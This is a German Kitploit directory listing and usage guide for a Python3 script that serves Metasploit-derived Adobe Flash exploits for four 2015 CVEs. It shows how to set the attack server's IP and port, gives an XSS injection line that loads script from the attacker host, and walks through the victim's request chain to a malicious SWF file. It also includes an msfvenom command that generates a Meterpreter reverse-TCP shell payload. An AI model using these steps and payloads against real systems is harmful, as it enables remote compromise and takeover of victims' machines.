Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Adobe-Flash-Exploits_17-18 — Konvertierte Metasploit-Exploits für Adobe Flash-Sicherheitslücken CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 und CVE-2015-5122 in ein Python3-Skript. | Kitploit
Tools/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
Exploit-FrameworksPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

Konvertierte Metasploit-Exploits für Adobe Flash-Sicherheitslücken CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 und CVE-2015-5122 in ein Python3-Skript.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 4 JahrenNoch nicht geprüft

Adobe Flash Exploits CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 und CVE-2015-5122 Python3-Skript

Konvertierte Metasploit-Exploits für Adobe Flash-Sicherheitslücken CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 und CVE-2015-5122 in ein Python3-Skript.

Informationen

Dieses Skript hostet einen Webserver, der jeweils eine der folgenden Adobe Flash-Sicherheitslücken ausnutzen kann:

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

Ausführung

Sie müssen Änderungen (hier beschrieben) an exploit.py vornehmen, um Ihren Anforderungen zu entsprechen.

Änderungen

  • hostname = "192.168.1.100"
    • Dies ist eine IP auf dem Angriffssystem, die den Exploit-Webserver hostet.
  • serverPort = 8080
    • Dies ist der Port auf dem Angriffssystem, der den Exploit-Webserver hostet.
  • xss = False
    • Wenn auf True gesetzt, wird die erste Anfrage des Opfers an den Server als JavaScript behandelt:
      • Beispiel XSS-Injection:
        • <script src="http://192.168.1.100:8080/"></script>
      • Angriffspfad:
        • Opferanfrage 1 -> XSS-verwundbarer Server:
          • Das Opfer greift auf eine XSS-Injection auf einem entfernten Server zu, die eine JavaScript-Datei anfordert (siehe Anfrage 2).
        • Opferanfrage 2 -> JavaScript-Quelle auf Angriffssystem.
        • Opferanfrage 3 -> Böswillige SWF-Datei.
    • Wenn auf False gesetzt, wird die erste Anfrage des Opfers an den Server als HTML behandelt:
      • Beispiel:
        • http://192.168.1.100:8080/
      • Angriffspfad:
        • Opferanfrage 1 -> HTML-Datei auf Angriffssystem.
        • Opferanfrage 2 -> Böswillige SWF-Datei.
  • base64Payload = "..."
    • Dies ist der Base64-Payload, der auf dem Opfersystem ausgeführt wird.
    • Ändern Sie den untenstehenden Beispielbefehl nach Ihren Bedürfnissen und generieren Sie Ihren Payload:
      • Beispiel:
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • Hinweis: Der einzige Payload, der bei mir funktioniert hat, ist windows/meterpreter/reverse_tcp.

  • swfFile = swfFileList['37368']
    • Wählen Sie die Adobe Flash-Exploit-SWF-Datei zur Ausnutzung des Opfersystems aus:
      • root@kitploit:~
        swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        

Ausführen

Führen Sie den folgenden Befehl im selben Verzeichnis wie die bösartigen SWF-Dateien aus, um das Adobe Flash-Exploit-Skript auszuführen:

  • python3 exploit.py

Referenzen:

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599

Tool herunterladen